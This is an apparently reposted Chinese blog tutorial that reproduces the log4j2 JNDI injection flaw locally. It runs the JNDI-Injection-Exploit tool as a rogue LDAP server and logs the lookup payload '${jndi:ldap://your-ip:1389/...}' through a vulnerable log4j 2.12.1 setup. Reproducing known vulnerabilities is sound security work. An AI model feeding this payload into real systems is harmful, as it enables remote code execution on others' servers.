最近大家应该都有被log4j2的JNDI注入漏洞搞的心烦意乱,当程序将用户输入的数据进行日志输出时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。
以下为改问题的复现方法:
1、首先下载JNDI-Injection 起 RMI 或者 LDAP 服务
①前往这里下载
②使用以下命令启动服务
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
如下为启动后的截图,马赛克仅为我的ip
2、本地新建一个maven项目
①pom引用如下
复制代码
1
2
3
4
5
6
7
8
9
10<dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-core</artifactId> <version>2.12.1</version> </dependency> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-api</artifactId> <version>2.12.1</version> </dependency>
②直接使用main方法输出日志,代码如下,你的ip 需要自己修改:
复制代码
1
2
3
4
5
6public class App { private static final Logger logger = LogManager.getLogger(App.class); public static void main(String[] args) { logger.error(" ${jndi:ldap://你的ip:1389/log4jtest}"); } }
3、ldap服务端有日志输出,则说明问题复现,如下截图
最后
以上就是害怕美女最近收集整理的关于log4j2 JNDI注入漏洞问题复现的全部内容,更多相关log4j2内容请搜索靠谱客的其他文章。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复